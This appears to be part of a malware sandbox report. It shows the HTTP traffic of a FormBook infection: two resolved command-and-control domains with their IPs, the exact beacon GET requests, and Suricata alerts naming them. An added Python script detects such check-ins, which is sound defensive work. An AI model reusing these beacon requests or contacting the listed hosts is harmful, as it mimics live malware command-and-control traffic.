Network Analysis
Name | Response (resolved address) | Post-Analysis Lookup |
---|---|---|
www.elsonidodelacalle.com | 209.99.64.55 | |
www.conveniencestorelosangeles.com | 52.44.94.227 | |
HTTP traffic
GET 200 http://www.elsonidodelacalle.com/m3n0/?FPWhH4Y=m4MFs36Ucpj1GyErAGBxkzm4FiJMt3pbCU5S1e6L9Cs2CafjD4xrmEyE6l1gxjHDfcxPRFuP&Bl=lHUl2XmxXLc
REQUEST
GET /m3n0/?FPWhH4Y=m4MFs36Ucpj1GyErAGBxkzm4FiJMt3pbCU5S1e6L9Cs2CafjD4xrmEyE6l1gxjHDfcxPRFuP&Bl=lHUl2XmxXLc HTTP/1.1
Host: www.elsonidodelacalle.com
Connection: close
RESPONSE
HTTP/1.1 200 OK
Date: Fri, 20 Aug 2021 00:38:11 GMT
Server: Apache
Set-Cookie: vsid=929vr3769654916939351; expires=Wed, 19-Aug-2026 00:38:11 GMT; Max-Age=157680000; path=/; domain=www.elsonidodelacalle.com; HttpOnly
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_Yp2jvxki5ycdQ/gAEj+s0ENrm/mcc8lSUMMhdVEIkFmbXSfMgbgTReCqP84MJ7/TAgU4X4BKMUnVrkGp0uvG9Q==
Keep-Alive: timeout=5, max=111
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
GET 301 http://www.conveniencestorelosangeles.com/m3n0/?FPWhH4Y=Y8aNBIvgUljk+Y154DjGmLXqNUZReizFXju5Ab+xsn7ClCWV4MsKuafR6FKqj9jPN8Yt2Da/&Bl=lHUl2XmxXLc
REQUEST
GET /m3n0/?FPWhH4Y=Y8aNBIvgUljk+Y154DjGmLXqNUZReizFXju5Ab+xsn7ClCWV4MsKuafR6FKqj9jPN8Yt2Da/&Bl=lHUl2XmxXLc HTTP/1.1
Host: www.conveniencestorelosangeles.com
Connection: close
RESPONSE
HTTP/1.1 301 Moved Permanently
Server: openresty
Date: Fri, 20 Aug 2021 00:38:50 GMT
Content-Type: text/html
Content-Length: 182
Connection: close
Location: https://www.conveniencestorelosangeles.com/m3n0/?FPWhH4Y=Y8aNBIvgUljk+Y154DjGmLXqNUZReizFXju5Ab+xsn7ClCWV4MsKuafR6FKqj9jPN8Yt2Da/&Bl=lHUl2XmxXLc
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.102:49167 -> 52.44.94.227:80 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
TCP 192.168.56.102:49167 -> 52.44.94.227:80 | 2031449 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
TCP 192.168.56.102:49167 -> 52.44.94.227:80 | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
TCP 192.168.56.102:49166 -> 209.99.64.55:80 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
TCP 192.168.56.102:49166 -> 209.99.64.55:80 | 2031449 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
TCP 192.168.56.102:49166 -> 209.99.64.55:80 | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
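The two check-in requests the alerts above fire on share one shape: a GET to a short alphanumeric directory (/m3n0/), a query string of exactly two parameters whose first value is 72 characters of base64-like data, and a header set that consists of nothing but Host and Connection: close. The script below is an added triage example, not part of the sandbox report and not a reproduction of the Emerging Threats rules 2031412/2031449/2031453; it parses raw request text by hand (so that '+' and '/' inside the payload survive), scores each of those three traits, and flags a request when all three are present. The thresholds, the path-length range and the benign contrast request are assumptions chosen from the two captures on this page.

```python
"""Heuristic triage of FormBook-style HTTP check-ins.

Added example: the pattern checked here is derived from the two requests
captured in this report and is an assumption about the beacon format, not
the content of the Suricata signatures listed above.
"""
import re
from dataclasses import dataclass, field

# Constructed sample input: the two requests exactly as captured in the report,
# plus one benign request written for contrast (the benign one is an assumption).
SAMPLE_REQUESTS = [
    "GET /m3n0/?FPWhH4Y=m4MFs36Ucpj1GyErAGBxkzm4FiJMt3pbCU5S1e6L9Cs2CafjD4xrmEyE6l1gxjHDfcxPRFuP&Bl=lHUl2XmxXLc HTTP/1.1\r\n"
    "Host: www.elsonidodelacalle.com\r\n"
    "Connection: close\r\n\r\n",
    "GET /m3n0/?FPWhH4Y=Y8aNBIvgUljk+Y154DjGmLXqNUZReizFXju5Ab+xsn7ClCWV4MsKuafR6FKqj9jPN8Yt2Da/&Bl=lHUl2XmxXLc HTTP/1.1\r\n"
    "Host: www.conveniencestorelosangeles.com\r\n"
    "Connection: close\r\n\r\n",
    "GET /index.html?page=2 HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Accept: text/html\r\n"
    "Connection: close\r\n\r\n",
]

# Whole path is a single short alphanumeric directory (assumed range 2-6 chars).
PATH_RE = re.compile(r"^/[A-Za-z0-9]{2,6}/$")
# Base64 alphabet, at least 40 chars, optional padding (assumed threshold).
B64ISH_RE = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")


@dataclass
class Verdict:
    host: str
    path: str
    params: list
    reasons: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # All three traits must be present; any single one is common in benign traffic.
        return len(self.reasons) >= 3


def parse_request(raw: str):
    """Split a raw HTTP/1.1 request into method, path, query params and headers."""
    lines = raw.replace("\r\n", "\n").split("\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if not line:  # blank line ends the header block
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    path, _, query = target.partition("?")
    # Split the query by hand: urllib.parse.parse_qsl would turn '+' into a
    # space and decode '/', both of which occur inside the base64-like payload.
    params = [tuple(p.split("=", 1)) if "=" in p else (p, "")
              for p in query.split("&") if p]
    return method, path, params, headers


def triage(raw: str) -> Verdict:
    """Score one request against the three traits seen in the captured check-ins."""
    method, path, params, headers = parse_request(raw)
    verdict = Verdict(headers.get("host", ""), path, params)
    if method == "GET" and PATH_RE.match(path):
        verdict.reasons.append("short alphanumeric directory as the whole path")
    if (len(params) == 2 and B64ISH_RE.match(params[0][1])
            and len(params[1][1]) < 32):
        verdict.reasons.append("two params: long base64-like value, then a short one")
    if "user-agent" not in headers and set(headers) <= {"host", "connection"}:
        verdict.reasons.append("no User-Agent; only Host and Connection headers")
    return verdict


def triage_all(requests=SAMPLE_REQUESTS):
    return [triage(r) for r in requests]


if __name__ == "__main__":
    for v in triage_all():
        print(v.host, "SUSPICIOUS" if v.suspicious else "ok", v.reasons)
```

Both captured requests score all three traits and the contrast request scores none; in practice the path and payload-length checks would be tuned against the organisation's own baseline, since short directories and long opaque query values also appear in legitimate ad and analytics traffic.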
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts